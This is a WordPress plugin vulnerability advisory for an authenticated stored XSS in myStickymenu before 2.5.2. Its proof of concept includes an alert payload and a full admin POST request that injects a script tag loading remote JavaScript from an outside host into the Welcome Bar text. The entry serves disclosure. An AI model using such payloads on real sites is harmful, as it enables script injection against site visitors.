WordPress Plugin Vulnerabilities
myStickymenu < 2.5.2 - Authenticated Stored XSS
Description
The plugin does not sanitise or escape its Bar Text settings, allowing hight privilege users to use malicious JavaScript in it, leading to a Stored Cross-Site Scripting issue, which will be triggered in the plugin's setting, as well as all front-page of the blog (when the Welcome bar is active)
Proof of Concept
Put the following payload in the Bar Text settings of the plugin and save them: </textarea><script>alert(/XSS/)</script> PoC | Authenticated Persistent XSS | Welcome Bar > Bar Text: POST /wp-admin/admin.php?page=my-stickymenu-welcomebar HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 1634 mysticky_option_welcomebar%5Bmysticky_welcomebar_enable%5D=1&mysticky_option_welcomebar%5Bmysticky_welcomebar_position%5D=top&mysticky_option_welcomebar%5Bmysticky_welcomebar_bgcolor%5D=%2303ed96&mysticky_option_welcomebar%5Bmysticky_welcomebar_bgtxtcolor%5D=%23000000&mysticky_option_welcomebar%5Bmysticky_welcomebar_font%5D=Poppins&mysticky_option_welcomebar%5Bmysticky_welcomebar_fontsize%5D=14&mysticky_option_welcomebar%5Bmysticky_welcomebar_bar_text%5D=PoC%3C%2Ftextarea%3E--%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E&mysticky_option_welcomebar%5Bmysticky_welcomebar_x_desktop%5D=desktop&mysticky_option_welcomebar%5Bmysticky_welcomebar_x_mobile%5D=mobile&mysticky_option_welcomebar%5Bmysticky_welcomebar_btn_desktop%5D=desktop&mysticky_option_welcomebar%5Bmysticky_welcomebar_btn_mobile%5D=mobile&mysticky_option_welcomebar%5Bmysticky_welcomebar_btncolor%5D=%23000000&mysticky_option_welcomebar%5Bmysticky_welcomebar_btntxtcolor%5D=%23ffffff&mysticky_option_welcomebar%5Bmysticky_welcomebar_btn_text%5D=Got+it%21&mysticky_option_welcomebar%5Bmysticky_welcomebar_attentionselect%5D=flash&mysticky_option_welcomebar%5Bmysticky_welcomebar_actionselect%5D=redirect_to_url&mysticky_option_welcomebar%5Bmysticky_welcomebar_redirect%5D=https%3A%2F%2Fwww.yourdomain.com&mysticky_option_welcomebar%5Bmysticky_welcomebar_aftersubmission%5D=dont_show_welcomebar&mysticky_option_welcomebar%5Bmysticky_welcomebar_triggersec_automatically%5D=0&mysticky_option_welcomebar%5Bmysticky_welcomebar_entry_effect%5D=slide-in&submit=Save&nonce=d70ad0b6ae&active_tab_element=1&save_welcome_bar=
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
m0ze
Submitter
m0ze
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-06-21 (about 2 years ago)
Added
2021-06-28 (about 2 years ago)
Last Updated
2022-03-05 (about 2 years ago)